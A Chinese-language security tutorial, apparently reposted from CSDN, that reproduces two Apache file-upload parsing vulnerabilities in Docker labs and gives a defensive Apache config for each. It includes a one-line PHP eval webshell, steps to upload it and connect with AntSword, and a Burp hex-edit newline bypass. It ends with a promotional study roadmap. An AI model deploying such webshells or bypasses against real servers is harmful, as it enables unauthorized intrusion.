本文介绍: 1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程规范。(非常重要)2、渗透测试基础(一周)①渗透测试流程分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking漏洞扫描漏洞利用、原理,利用方法工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)

一、多后缀解析漏洞

形成原因: 配置apache时,对于apache配置不熟练,配置命令不清楚,在配置PHP文件处理程序时,配置命令存在问题:位于漏洞环境目录
conf/dockerphp.conf里的配置命令(AddHandler application/xhttpdphp
.php),该命令会将后缀中只要含有.php文件都会被处理程序解析,这导致攻击者可通过多后缀绕过文件上传限制以.php结尾的机制,并使之被处理程序执行

漏洞复现

在漏洞环境目录运行容器

[root@localhost apache_parsing_vulnerability]# dockercompose upd

1655738297_62b08fb906a7ed9ede6bc.png!small

浏览器访问你的ip地址可以看到一个文件上传网页1655738463_62b0905fd4141931e3d38.png!small

打开文本编辑器,构造一句话木马

<?php eval(@$_POST[‘axx‘]); ?>

文件命名xxx.php.jpg

1655738881_62b092011240c89ef8ada.png!small

将该文件上传,出现该页面

1655739010_62b09282d1fa78099f178.png!small

打开蚁剑,点击添加数据

1655739102_62b092de7fbe4dcedc563.png!small

按图中提示填写

1655739374_62b093ee05e124d726cad.png!small

测试连接连接成功

1655739614_62b094de514082556b413.png!small

点击添加,可看到我们可以查看该漏洞所在环境目录中的文件

1655739701_62b09535d87d129e44525.png!small

漏洞复现完成。

两种漏洞防御方法:

1,拒绝所有文件名含有.php文件

<FilesMatch “.php.”>

require all denied

2,处理程序处理以.php 结尾文件

首先将上一个防御方案的配置命令注释

注释掉原本的处理出现配置命令AddHandler application/xhttpd-php .php

<FilesMatch “.+.php$”>

SetHandler application/x-httpd-php

以上就是apache多后缀解析漏洞的知识

二、换行解析漏洞

形成原因:

1)查看网页html代码可知,该文件上传时采用黑名单形式过滤php文件

1655811585_62b1ae0188dea2cfa61ef.png!small

2)配置文件设置正则表达式 对象的 Multiline 属性

1655811703_62b1ae77d4a54690b7136.png!small

$ 还会匹配字符串结尾的换行符,这导致在上传时,添加一个换行符也能被正常解析,并且能够绕过系统的黑名单检测

漏洞复现

在漏洞目录运行容器

[root@localhost CVE-2017-15715]# dockercompose up -d

1655811909_62b1af457d8e020f05935.png!small

构造一个简单php文件

1655812007_62b1afa7109101c138294.png!small

<?php phpinfo(); ?>

打开bp,抓取上传数据包

选择16进制,找到文件上传后的名字,默认为evil.php寻找l6进制编码 70 68 70分别对应 php,在第二个70的后方右键,点击 insert
byte… ,然后插入换行符0a
点击确定进行插入1655812219_62b1b07b595215a0c5f4d.png!small

放行数据包访问上传的文件,成功看到phpinfo信息。要加%0A

漏洞防御方法:

1,升级apache版本

2,对上传的文件进行重命名

3,上传时采用白名单验证方式

选择16进制,找到文件上传后的名字,默认为evil.php寻找l6进制编码 70 68 70分别对应 php,在第二个70的后方右键,点击 insert
byte… ,然后插入换行符0a
点击确定进行插入。[外链图片转存中…(img-e1JNAheC-1674869680876)]

放行数据包访问上传的文件,成功看到phpinfo信息。要加%0A

漏洞防御方法:

1,升级apache版本

2,对上传的文件进行重命名

3,上传时采用白名单的验证方式

最后

分享一个快速学习【网络安全】的方法,「也许是」最全面的学习方法:
1、网络安全理论知识(2天)
①了解行业相关背景,前景,确定发展方向。
②学习网络安全相关法律法规。
网络安全运营的概念
④等保简介、等保规定、流程规范。(非常重要)

2、渗透测试基础(一周)
渗透测试的流程分类、标准
信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察
④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等

3、操作系统基础(一周)
①Windows系统常见功能命令
②Kali Linux系统常见功能和命令
操作系统安全(系统入侵排查/系统加固基础)

4、计算机网络基础(一周)
计算机网络基础、协议架构
网络通信原理、OSI模型数据转发流程
③常见协议解析(HTTP、TCP/IP、ARP等)
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现

5、数据库基础操作(2天)
数据库基础
②SQL语言基础
数据库安全加固

6、Web渗透(1周)
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)

在这里插入图片描述

恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作比如渗透测试、Web 渗透、安全服务、安全分析等岗位;如果等保模块学的好,还可以从事等保工程师。薪资区间6k-15k

到此为止,大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗?

想要入坑黑客&amp;网络安全的朋友,给大家准备了一份:282G全网最全的网络安全资料免费领取!
扫下方二维码免费领取

有了这些基础,如果你要深入学习,可以参考下方这个超详细学习路线图,按照这个路线学习,完全够支撑你成为一名优秀的中高级网络安全工程师:

高清学习路线图或XMIND文件(点击下载原文件)

还有一些学习中收集视频文档资源,有需要可以自取:
每个成长路线对应板块的配套视频


当然除了有配套的视频,同时也为大家整理了各种文档书籍资料&amp;工具,并且已经帮大家分好类了。

因篇幅有限,仅展示部分资料需要的可以【扫下方二维码免费领取】

原文地址:https://blog.csdn.net/text2203/article/details/128774893

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。

如若转载,请注明出处:http://www.7code.cn/show_9823.html

如若内容造成侵权/违法违规/事实不符,请联系代码007邮箱:suwngjj01@126.com进行投诉反馈,一经查实,立即删除

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注